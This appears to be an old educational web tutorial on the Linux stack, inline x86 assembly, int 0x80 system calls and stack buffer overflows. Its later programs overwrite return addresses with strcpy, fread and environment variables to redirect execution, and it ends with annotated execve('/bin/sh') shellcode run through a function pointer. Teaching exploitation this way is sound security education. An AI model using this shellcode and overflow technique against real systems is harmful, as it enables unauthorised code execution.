Stack Management – Buffer Overflow - Linux

 

Security is one of the fastest-growing areas in information technology management. Denial Of Service, Buffer Overflows, Email viruses etc have become general terms in today's info world. There may not be a single computer user world over who has not been hit by these and many more attacks. Therefore, recently a lot of emphasis is laid on securing the computer systems from intruders and viruses as the effects of these attacks can be so drastic and thus irreparable.

 

In our papers, we will look at demystifying these grave attacks, from the coder's point of view. Our belief is that to understand these attacks, one needs to be in the shoes of the hackers/crackers. And mind you, every hacker/cracker is a born programmer. We start with the assumption that you are well-versed with the basics of the C programming language. Nevertheless, we will re-revise some basic concepts and simultaneously learn assembler too. We can go on and on but we'd rather take a break and start hacking.

 

We start our journey with the vulnerability of buffer overflow

Buffer overflow technically means an overflow of the buffer. Every program is allocated some space or given buffer area in which it can write. A Buffer overflow occurs when the program spills over this buffer or tries to write in the area it is not supposed to. This allows an intruder to overwrite the existing instruction in that area, thereupon gaining full control over the system. However, before we understand the mechanism of this attack, we need to be well versed with memory management, a few concepts of stack and heap memory area.

 

Stack Memory

The programs given below give an analysis of memory allocations when a program is loaded.

 

a1.c

main()

{

abc(1,2);

pqr(3,4);

xyz(5,6);

abc(7,8);

}

abc(int i, int j)

{

printf("%p %p abc\n",&i,&j);

}

pqr(int x, int y)

{

printf("%p %p pqr\n",&x,&y);

}

xyz(int i, int j)

{

printf("%p %p xyz\n",&i,&j);

}

 

gcc -o a1 a1.c

./a1

 

Output

0xbffff900 0xbffff904 abc

0xbffff900 0xbffff904 pqr

0xbffff900 0xbffff904 xyz

0xbffff900 0xbffff904 abc

 

The above program at first glance may seem simplistic, but it is our first cut at learning internals. We are calling three functions abc, pqr and xyz with two parameters each. The two parameters in functions abc and xyz are named as i and j and for function pqr, the name is changed to x and y.

 

The program simply displays the addresses of parameters in each function. What is noteworthy here is that all functions display the same addresses for their parameters. Thus, it can be safely stated that the parameters to each function begin at the same place in memory. As in, for function abc, parameters i and j have been allocated the same memory locations as that of p and q for function pqr.

 

Thus, memory allocated for parameters of function is always the same for every function. Meaning to say, that there is no permanent memory allocated for function parameters.

 

a1.c

main()

{

abc();

pqr();

xyz();

abc();

}

abc()

{

int i,j;

printf("%p %p abc\n",&i,&j);

}

pqr()

{

int k,l;

printf("%p %p pqr\n",&k,&l);

}

xyz()

{

int i,j;

printf("%p %p xyz\n",&i,&j);

}

 

Output

0xbfffe004 0xbfffe000 abc

0xbfffe004 0xbfffe000 pqr

0xbfffe004 0xbfffe000 xyz

0xbfffe004 0xbfffe000 abc

 

The next example is a slightly modified version. The functions abc, pqr and xyz have remained the same but they do not accept parameters anymore. Instead, variables are created within these functions. Nevertheless, like before, all the printf's display identical addresses. This simply reassures the belief that local variables in a function are allocated the same address each time a function is called.

 

The technicality here is that when a function exits out, all the memory allocated to it is given to the next function to be called. Thus, functions are given volatile memory, as in, the memory allocated to it is reused by another function. Also, variable names have no meaning; it is the addresses assigned to these variables that hold value.

 

a1.c

main()

{

abc(1,2);

pqr(3,4);

xyz(5,6);

abc(7,8);

}

abc(int i1, int j1)

{

int i,j;

printf("i1=%p j1=%p i=%p j=%p abc\n",&i1, &j1 , &i,&j);

}

pqr(int k1 , int l1)

{

int k,l;

printf("k1=%p l1=%p k=%p l=%p pqr\n",&k1, &l1 , &k,&l);

}

xyz(int i1, int j1)

{

int i,j;

printf("i1=%p j1=%p i=%p j=%p xyz\n",&i1, &j1 , &i,&j);

}

 

Output

i1=0xbfffe180 j1=0xbfffe184 i=0xbfffe174 j=0xbfffe170 abc

k1=0xbfffe180 l1=0xbfffe184 k=0xbfffe174 l=0xbfffe170 pqr

i1=0xbfffe180 j1=0xbfffe184 i=0xbfffe174 j=0xbfffe170 xyz

i1=0xbfffe180 j1=0xbfffe184 i=0xbfffe174 j=0xbfffe170 abc

 

This program is a merger of the above two programs. The functions names are the same but now, not only do they accept two parameters, the function further creates two local variables on the stack. Printing out the addresses of the local variables and the parameters bring no surprises at all. They all remain the same for every function. 

 

A detailed version follows.

The value of 1 and 2 given to function abc are passed on to parameters i1 and j1. These parameters to functions take up some area in memory, which is called the stack. The internals of stack memory will be explained in just a short while.

 

The parameters that are passed to a function are placed on the stack in the reverse order, therefore first 2 goes on this stack memory and then 1.

 

For sake of understanding, lets take the actual values, where the stack begins at memory location 0xbfffe188. The value 2 is pushed or copied at this memory location thus moving the stack pointer to 0xbfffe184 and giving this address to j1, followed by 1 which is four memory locations away, i.e 0xbfffe180. This is very much proved by the program output, which show the same address locations for parameters i1 and j1.

 

Once the values are placed on the stack, the function code is executed. This function, abc, creates two local variables i and j. These are created at positions 0xbfffe174 and 0xbfffe170 as per the output. This goes to prove that besides parameters, local variables also use up the stack memory. The difference of 12 bytes between the parameters and variables is given to function call.  We know why but hang on, one concept at a time.

 

Now when the function quits out, the stack resets back to its original position of 0xbfffe188. A sure indication that someone moves the current memory pointer/the stack pointer up by 24 bytes. And, the same process is repeated for all function calls.

 

a1.c

main()

{

abc(1,2);

}

abc(int i1, int j1)

{

int i,j;

printf("i1=%p j1=%p i=%p j=%p abc\n",&i1, &j1 , &i,&j);

pqr(3,4);

}

pqr(int k1 , int l1)

{

int k,l;

printf("k1=%p l1=%p k=%p l=%p pqr\n",&k1, &l1 , &k,&l);

xyz(5,6);

aaa(8,9);

}

xyz(int i1, int j1)

{

int i,j;

printf("i1=%p j1=%p i=%p j=%p xyz\n",&i1, &j1 , &i,&j);

}

aaa(int i1, int j1)

{

int i,j;

printf("i1=%p j1=%p i=%p j=%p aaa\n",&i1, &j1 , &i,&j);

}

 

Output

i1=0xbfffe300 j1=0xbfffe304 i=0xbfffe2f4 j=0xbfffe2f0 abc

k1=0xbfffe2e0 l1=0xbfffe2e4 k=0xbfffe2d4 l=0xbfffe2d0 pqr

i1=0xbfffe2c0 j1=0xbfffe2c4 i=0xbfffe2b4 j=0xbfffe2b0 xyz

i1=0xbfffe2c0 j1=0xbfffe2c4 i=0xbfffe2b4 j=0xbfffe2b0 aaa

 

The above program reinforces the same principles that parameters and local variables are created on the stack.

The entry point function main calls function abc. The stack memory now starts at memory 0xbfffe308, the variables i and j are created at the memory locations 0xbfffe2f4 and 0xbfffe2f0 respectively. There is a gap of 12 bytes as seen before. 

 

At this point, the stack pointer is positioned at 0xbfffe2e8. When function pqr is called from within abc, the parameters 4 and 3 are pushed on the stack. This is in the reverse order, therefore first 4 goes on the stack at 0xbfffe2e4 and then 3 at 0xbfffe2e0. These become the addresses of parameters k1 and l1 respectively. The call then allocates 12 bytes on the stack for itself, thus giving the variables k and l the address of 0xbfffe2d4 and 0xbfffe2d0 respectively.

 

The next two function-call of xyz and aaa both give the same values. For the call of function xyz with function pqr, the stack is now at 0xbfffe2c8. The parameters 5 and 6 are pushed at address location 0xbfffe2c4 and 0xbfffe2c0 respectively. The variables i and j then are allocated after moving 12 away, thus end up at locations 0xbfffe2b4 and 0xbfffe2b0. When this function ends, the system moves the stack up the same amount that it moved down. Therefore, the stack at the end of the call of xyz will come to location 0xbfffe2c8.

 

The call of the aaa function follows the same process, thus bringing the stack back to 0xbfffe2c8 in the end. And the same goes for function pqr. As a result, at the end of each function, the stack moves back to where it was before the function is called.

 

This theory can be tried out with as many functions, but eventually, each will see the stack return to the same position it started. These functions in turn may call as many functions as well, however the same rules apply. At the end of a function call, the stack moves up as much as it had moved down. Each one cleans up its own mess.

 

a1.c

main()

{

int i,j;

i = 2;

j = 3;

printf("Address of i=%p j=%p\n",&i,&j);

abc(i,j);

printf("i=%d\n",i);

}

int abc(int x, int y)

{

int *z;

printf("Address of z=%p x=%p y=%p\n",&z,&x,&y);

z = &y;

printf("z=%p\n",z);

z++;z++;z++;z++;

printf("z=%p\n",z);

*z = 8;

}

 

Output

Address of i=0xbffff594 j=0xbffff590

Address of z=0xbffff574 x=0xbffff580 y=0xbffff584

z=0xbffff584

z=0xbffff594

i=8

 

This last example on stack shows how dangerous stack manipulation can get. The function main is the first function to be called and in all other aspects, it behaves in a similar manner like the other functions when dealing with stack memory. The local variables i and j in main are also created on the stack at 0xbffff594 and 0xbffff590.

 

The call to function abc will place the values 3 and 2 on the stack at locations 0xbffff580 and 0xbffff584 before taking up 12 bytes for itself. The parameters x and y are at the above addresses. The pointer variable z is stored at location 0xbffff574. This variable is initialized to address of parameter y, which is a value of 0xbffff584. Thereafter, z is incremented by 16, hence its new value is 0xbffff594. But, if you remember, this is the address occupied by variable i.

 

Further, using the features of pointers, a value of 8 is written to this location, thereupon actually changing the value of variable i. This is the power of pointers. One pointer variable, if it wants can overwrite the value of a variable in another function indirectly. Since, all local data is stored on the stack, it is susceptible to being overwritten.  Therefore, call someone else's function with care.

 

Assembler code in C programs

The next series of programs explain assembler programming. We believe that every programmer in the world should understand assembler. Unfortunately, our view is not held by the majority. It does not matter which language you use to write your code in, when it finally executes, it will be assembler code and not your favorite language code that executes. We are not suggesting that you write your code in assembler, all that we are saying is using assembler helps in understand the internals of computing better.

 

A microprocessor or a computer is made up of entities or memory called registers. These registers are the basic building blocks that any assembler programmer works with and they are given names like eax, ebx etc.

 

Whenever we encounter the return instruction in C like 'return 100', two things happen. One, the value 100 is placed in the eax register and two, the function ends thus control goes back to the function that called it. It is assumed here that any value returned by the called function will be found in the eax register.

 

a1.c

main()

{

int i;

i=abc();

printf(%d\n,i);

}

int abc()

{

return 100;

}

 

main()

{

int i;

i = abc();

printf("%d\n",i);

}

int abc()

{

__asm("mov $100,%eax");

}

 

Output

100

 

The gcc compiler allows us to call assembler code from C. You are also allowed to acess varibales defined in C in Assembler. The assembler syntax looks like a function call and requires the assembler instuction as a string. The most common assembler instruction is called mov. It requires two opearnds or parameters. The fisrt is the source and the second is the destination. As we want to move a number 100 in the eax register, our source is the number 100. All numbers must be prefaced by a $ sign.

 

We remind you once again, that a register is a named area in a microprocessor and all registers begin with a % sign. The assembler syntax was invented by AT&T, however if you are from the windows world or the nasm world, the

syntax is the other way around, i.e. mov destination, source.

 

The above program simulates the return instruction by simply placing a value in a register. The most common instruction is the mov instruction, which normally makes up over 25% of any assembler program.

 

To place the assembler instruction in a C program, we enclose the instructions within the keyword __asm with the normal brackets. In the above program the instruction set is placed in function abc. When the function executes, it simply moves/copies the value 100 in the eax register and then quits.

 

Coming back to function main, the value placed in the eax register is given to variable i. Thus, there is no way that the program knows or cares whether it is the return statement or a manual insertion of a value in the eax register that has done the job.

 

a1.c

main()

{

__asm("pushl $10");

__asm("pushl $20");

abc();

}

int abc(int i , int j)

{

printf("%d %d\n", i , j);

}

 

Output

20 10

 

The instruction pushl pushes the values on the stack. Windows uses the push instruction instead.

 

a1.c

main()

{

__asm("pushl $10");

__asm("pushl $20");

abc();

abc();

}

int abc(int i , int j)

{

printf("%d %d\n", i , j);

}

 

Output

20 10

20 10

 

The next series of programs show how a function call in C is converted to assembler code. When there is a call to a function, first, the parameters get pushed on the stack in the reverse order. In assembler, it is the pushl instruction that is used to push anything on the stack.

 

As a result, a call to abc function in C which is abc(20,10); will first push 10 on the stack using the push 10 instruction, which is then followed by the push 20 instruction .

 

Thereafter the abc function is called in the normal C way but with no parameters.

 

Function abc is oblivious to the number of parameters it gets called with. All that it assumes is that it is called with the parameters present on the stack. It displays their values and then returns to main. However, an error results. This is because the stack is not restored back to where it should be. We moved it down 12 bytes while supplying parameters, so once the function call ends, it has to be restored back.

The next program repairs this glitch.

 

a1.c

main()

{

__asm("pushl $10");

__asm("pushl $20");

abc();

__asm("addl $8,%esp");

abc();

}

int abc(int i , int j)

{

printf("%d %d\n", i , j);

}

 

Output

20 10

1108544020 1073828704

 

The program amends the error by adding 8 to the stack pointer using the esp register. It is the esp register which decides where the stack starts in memory. If its value is 100, the stack is said to start at memory location 100. With every push instruction, the stack moves down 4 bytes or goes 4 less.

 

The addl instruction takes the incremental value first and then the register as the second parameter. Since the stack is restored back to its original position as before the function call, no errors are seen anymore.

 

a1.c

main()

{

printf("esp=%x\n",esp());

__asm("pushl $10");

printf("esp=%x\n",esp());

__asm("pushl $20");

printf("esp=%x\n",esp());

abc();

printf("esp=%x\n",esp());

__asm("addl $8,%esp");

printf("esp=%x\n",esp());

}

int abc(int i , int j)

{

printf("%d %d\n", i , j);

}

int esp()

{

__asm("movl %esp,%eax");

}

 

Output

esp=bfffdd78

esp=bfffdd74

esp=bfffdd70

20 10

esp=bfffdd70

esp=bfffdd78

 

The above program shows a newly added function called esp. This function simply copies the value in the esp register to eax. This means that the return value of the function is now the stack position. As a result, before the first push, the stack position is seen at bfffdd78 and after the push 10 instruction, the stack shows a value of bfffdd74 which is 4 less. Thus the stack has moved down 4 bytes.

 

The second push 20 instruction moves the stack further down to bfffdd70. When function abc ends, the stack is at the same position of bfffdd70, which is what it was before the function call. These numbers re-confirm our explanation.

 

a1.c

int abc(int i , int j)

{

printf("%d %d\n", i , j);

}

 

main()

{

__asm("pushl $10

       pushl $20

       call abc

       addl $8,%esp

            ");

}

 

Output

20 10

 

All assembly instruction are placed in one asm block,it is allowed but depreciated. A function call in C has its equivalent in assembler; it is the call instruction. This instruction only requires the actual physical address of the function to be called. In this program, instead of giving the address of the function, we have given it the function name. The system internally replaces the name of the function with its address.

 

The only rationale in placing the function abc before main is that the compiler reads the entire file only once. It is a single pass one, therefore it does not reread the c file. Hence, it needs all function names to be created first before they can be used.

 

a1.c

int abc(int i , int j)

{

printf("%d %d\n", i , j);

}

main()

{

printf("%p\n",abc);

}

 

Output

0x8048328

 

The name of a function in C represents the address of the function. Therefore, the address of abc function when displayed shows 0x8048328(on our machine).

 

a1.c

int abc(int i , int j)

{

printf("%d %d\n", i , j);

}

main()

{

__asm("pushl $10

       pushl $20

       call 0x8048328

       addl $8,%esp

            ");

}

 

Output

20 10

 

Once we know the address of function abc as 0x8048328, we place this value in the eax register. The call instruction is then given the address or the function name through this eax register.

 

For the call instruction, the value given to it is where it assumes some program resides. Hence, it starts treating the bytes at that location as program code and starts executing them. Just for your information, it is the job of the compiler/linker to replace function names with actual addresses.

 

a1.c

int abc(int i , int j)

{

printf("%d %d\n", i , j);

}

main()

{

__asm("pushl $10

       pushl $20

       movl $0x8048328,%eax      

       call *%eax

       call %eax

       addl $8,%esp

            ");

}

 

Output

20 10

 

The call instruction can be take a register as an operand. Though it is optional using a * along with it, both of them cannot be used together in one program.

 

a1.c

main()

{

int p = 6;

int q = 7;

printf("p=%p q=%p\n",&p,&q);

abc(3,4);

pqr();

}

int abc(int i , int j)

{

int x = 1;

int y = 2;

printf("i=%p j=%p\n",&i,&j);

printf("x=%p y=%p\n",&x,&y);

printf("abc %x %x %x %x %x %x %x\n");

}

int pqr()

{

printf("pqr %x %x %x %x %x %x %x\n");

}

 

Output

p=0xbfffee94 q=0xbfffee90

i=0xbfffee80 j=0xbfffee84

x=0xbfffee74 y=0xbfffee70

abc bfffee74 bfffee70 42015554 2 1 bfffee98 804836a

pqr 1 bfffee98 804836a 3 4 bfffee98 8048372

 

a1.c

main()

{

abc(10,20);

}

abc(int i , int j)

{

int p = 100;

int q = 200;

printf("i=%p j=%p p=%p q=%p\n",&i,&j,&p,&q);

__asm("movl $4,-4(%ebp)");

__asm("movl $3,-8(%ebp)");

__asm("movl $2,8(%ebp)");

__asm("movl $1,12(%ebp)");

printf("p=%d q=%d i=%d j=%d\n",p,q,i,j);

}

 

Output

i=0xbffff380 j=0xbffff384 p=0xbffff374 q=0xbffff370

p=4 q=3 i=2 j=1

 

The round brackets stand for a * or indirection. The is equivalent to a square bracket [] in the windows assembler syntax.

 

a1.c

main()

{

char *argv[2] = {"/bin/sh",0};

execve("/bin/sh",argv,0);

printf("Bye\n");

}

 

To execute a program, we use the execve function. The first parameter is the name of the program, in this case it is the bourne shell sh.The second is an array of pointers to chars or argv and the third argument is an array of pointers to the environment block. This function hands over the control to the shell thus ignoring the remaining statements in the file. As a result, the last printf does not get executed. As always, the exit command at the shell prompt quits out of the shell just created.

 

a1.c

main()

{

asm("nop");

}

 

The nop instruction does nothing at all but yet is very useful for us.

 

a1.c

main()

{

printf("Main %p\n",main);

__asm("pushl $0x8048328");

__asm("ret");

}

 

//pause

main()

{

__asm("mov $29,%eax");

__asm("int $0x80");

printf("Bye\n");

}

 

In the Windows world, code is always called from a dll or shared library. In Linux and Unix system calls are made.For this purpose, values are put in  registers and an interrupt is generated. For examply, when a key is pressed on the keyboard, the keyboard generates interrupt 9.Calling an interrupt is demand immediate attention from the microprocessor so that it can perform the task.

 

The above programs aims at calling interrupt 80h. However, prior to that values have be placed in the registers, which in our case is the eax register. These values are predecided and inform the OS of the task that needs to be performed. A value of 29 indicates a pause.

 

First, the value of 29 is moved in the eax register and then interrupt 80

is called using the int instruction. The program when executed comes to an abrupt halt unless Crtl-D is pressed. The string bye does not get displayed.

 

a1.c

//exit

main()

{

__asm("mov $1,%eax");

__asm("mov $4,%ebx");

__asm("int $0x80");

printf("Bye\n");

}

 

To quit out of a program, the exit function is frequently used. This internally is through the interrupt 80 with the vlaues of 1 in the eax register. The number 4 in the ebx register is basically returned to the operating system and it can be any number for that matter. The above program mimics the function call. Thus, once again the bye does not get displayed.

 

a1.c

main()

{

printf("%d\n",getpid());

__asm("mov $2,%eax");

__asm("int $0x80");

printf("%d..\n",getpid());

}

 

Output

10313

10314..

10313..

 

Every program when loaded in memory gets a unique number or process id (pid) by which it is know by to the OS. The function getpid returns this process id. In our case our programs pid is 10313. The fork function creates one more process or a child in memory. For this, the fork function puts 2 in the eax register and calls int 80. As a result, the last printf gets called twice, once for the parent and one for the child. In both cases, we are printing the pid and the output clearly shows that the child has been given a new pid of 10314.

 

a1.c

int i;

main()

{

asm("movl $20, %eax");

asm("int $0x80");

asm("movl %eax,i");

printf("Hi %d %d\n",i,getpid());

}

 

Output

Hi 15415 15415

 

Moving 20 in the eax register and calling int 80 is what the getpid

function is all about. The result of this interrupt is placed in the eax register. In the program, the value in the eax register is moved into variable i which is then printed out. We are allowed to use C variables directly in assembler code. Along with i, the getpid function is used again to prove that the values are the same.

 

a1.c

main()

{

asm("int $0x80" : : "a"(2));

printf("Hi\n");

}

 

Output

Hi

Hi

 

There is a shorter form to the int 80 instruction. For this the instruction starts with int 0x80 followed by two colons. After the colons are placed the names of the registers in double inverted commas along with the values that go in them in round brackets. As a result,  the value 2 in the above program gets placed in the eax register and int 80 is called. This is similar to the fork call. The printf function thus gets displayed twice.

 

a1.c

main()

{

int i;

printf("pid=%d ppid=%d\n",getpid(),getppid());

asm("int $0x80" : "=a" (i) : "a" (2));

printf("Hi i=%d pid=%d ppid=%d\n",i,getpid(),getppid());

}

 

Output

pid=15445 ppid=15111

Hi i=0 pid=15446 ppid=15445

Hi i=15446 pid=15445 ppid=15111

 

The getppid function displays the parents process id which in our case is that of the shell 15111. Our programs pid is 15445. The int 80 instruction has a =a within the two colons which signifies that after int 80 is generated, the return value in the eax register must be placed in the varible specified in round brackets. Thus whatever is after the first colon is for return values, the second colon is for values to be placed in registers.

 

a1.c

main()

{

kill(1066,9);

}

 

The ps -e instruction gives a list of programs with their process ids. The kill function sends a signal to the running process. The first parameter is always the process id, 1066 and the second is the signal no, 9 to be sent. A signal of 9 terminates a program.

 

a1.c

main()

{

asm("int $0x80" : : "a" (37),"b" (1066), "c" (9));

}

 

In assembler, the function is represented by a value of 37 in the eax register, the pid in the ebx register and the signal 9 in the ecx register.

 

//mkdir vmci

a1.c

main()

{

char *p = "vmci";

asm("int $0x80" : : "a" (39), "b" (p));

}

 

The value 39 creates a sub directory. Here, the register ebx holds the the name of the directory to be created, which in our case is represented by pointer p.

 

a1.c

main()

{

char *p = "hel\nlo";

asm("int $0x80" : : "a" (4) , "b" (1) , "c" (p) , "d" (5));

}

 

Output

hel

l

 

The printf function finally calls the write system call. This is by

placing 4 in the eax register. The file handle to write to, in our case 1 is standard output in ebx, ecx the string to write and edx the number of characters to write 5. Thus the Hel and \n and one more l gets written on screen. The last o is ignored.

 

a1.c

main()

{

abc();

}

int abc()

{

char a[3];

strcpy(a,"AAAAAAAAAAAAAAAAAAAAAAAABBBBCDEF");

}

 

There is not one way to skin a cat. This program takes a different approach to overwrite the return address. As the array a is the first and only variable, a few bytes above it is placed the return address. The strcpy function does no bounds checking on the size of the array, thus it overwrites the return address with the characters in the array.

 

a1.c

main()

{

abc();

}

int abc()

{

char a[3];

a[24]='B';

a[25]='B';

a[26]='B';

a[27]='B';

a[28]='C';

a[29]='D';

a[30]='E';

a[31]='F';

}

 

This is one more program to ascertain the fact that the array is not restricted to the size it is initialized to. Since a is merely a pointer to a location in memory, using the array syntax, the other areas in memory can easily be accessed. While doing some research on this topic we found out that the gcc compiler adds enough code to ensure a secure environment. Thus the return address is found at location 28,29,30,31.

 

z.c

#include <stdio.h>

main()

{

FILE *fp; int i;

fp = fopen("q10.txt","w");

for ( i = 0 ; i<= 7 ; i++)

fputc('A',fp);

 

fputc('B',fp);

fputc('B',fp);

fputc('B',fp);

fputc('B',fp);

fputc('C',fp);

fputc('D',fp);

fputc('E',fp);

fputc('F',fp);

}

 

A file called q10.txt is opened for writing. Using the function fputc, which takes a character and the file pointer, 8 A’s are written on to disk using the for loop. Thereafter, a few more characters are written individually to the file.

 

z1.c

#include <stdio.h>

main()

{

FILE *fp;char a[4];

fp = fopen("q10.txt","r");

fread(a,100,1,fp);

}

 

The above program is a sequel to the previous one. It opens the file q10.txt and then reads the next 100 bytes into an array a. However, since the array is only 4 bytes large only 4 bytes are allocated to the array. Thus the first 4 A’s will be saved in the allocated array memory and thereafter it overwrites the stack area with the other characters. The fread function in one go places all these bytes on the stack without realizing that it is overwriting the existing instruction thus causing a buffer overflow.

 

>export VIJAY=`perl -e 'print "A" x 200'`

a1.c

main()

{

char *p;

p = getenv("VIJAY");

printf("%s\n",p);

}

 

Output

lots of A's

 

a1.c

main()

{

char *p;char a[64];

p = getenv("VIJAY");

strcpy(a,p);

}

 

This program shows Segmentation fault since the registers have been overwritten.

 

a1.c

int pqr()

{

printf("In pqr\n\n");

exit(1);

}

main()

{

printf("pqr=%p\n",pqr);

abc();

}

int abc()

{

char a[3];

a[24]='B';

a[25]='B';

a[26]='B';

a[27]='B';

a[28]=0x5c;

a[29]=0x83;

a[30]=0x04;

a[31]=0x08;

}

 

Output

pqr=0x804835c

In pqr

 

Disassembled output

>gdb a1

 

x/12b 0x8048338

0xb8    0x01    0x00    0x00    0x00    0xcd    0x80

 

Before calling function abc in main, we run the program as is to find out the address of function pqr. On our machine the address is 0x804835c. This value is then given in abc to the memory location 28,29,30,31. As seen in the earlier program, these location stores the return address of the code to be called when main ends. Now that it has been overwritten by the address of function pqr, pqr is called and hence we see the printf displaying In pqr.

 

The pqr function having exit has been shown in the disassembled form using the gdb debugger. Here 1 is moved in the eax register and then interrupt 80 is called.

 

a1.c

main()

{

__asm("mov $1,%eax");

__asm("int $0x80");

printf("Bye\n");

}

 

The disassembled output of this program shows the assembler instruction for the exit function. These instructions are then placed into an array in the next program.

 

a1.c

char p[] = "\xb8\x01\x00\x00\x00\xcd\x80";

main()

{

char (*q)();

q = p;

printf("Hi\n");

q();

printf("Bye\n");

}

 

Output

Hi

 

The array p holds the assembler instruction for the exit function. Q is now a pointer to function and is initialized to array p. On executing the program, the printf function displays Hi. Thereafter, code at address location q is executed. Since this code represents the exit function, the program terminates without displaying Bye.

 

a1.c

char p[] = "\xeb\x1d"   /* jmp callz */

/* start: */

"\x5e"         /* popl %esi               */

"\x29\xc0"     /* subl %eax, %eax         */

"\x88\x46\x07" /* movb %al, 0x07(%esi)    */

"\x89\x46\x0c" /* movl %eax, 0x0c(%esi)   */

"\x89\x76\x08" /* movl %esi, 0x08(%esi)   */

"\xb0\x0b"     /* movb $0x0b, %al         */

"\x87\xf3"     /* xchgl %esi, %ebx        */

"\x8d\x4b\x08" /* leal 0x08(%ebx), %ecx   */

"\x8d\x53\x0c" /* leal 0x0c(%ebx), %edx   */

"\xcd\x80"     /* int $0x80               */

"\x29\xc0"     /* subl %eax, %eax         */

"\x40"         /* incl %eax               */

"\xcd\x80"     /* int $0x80               */

/* callz: */

"\xe8\xde\xff\xff\xff" /*call start*/

"/bin/sh";

main()

{

char (*q)();

q = p;

q();

}

 

This program works on the same principles and creates a shell.

 

Back to the main page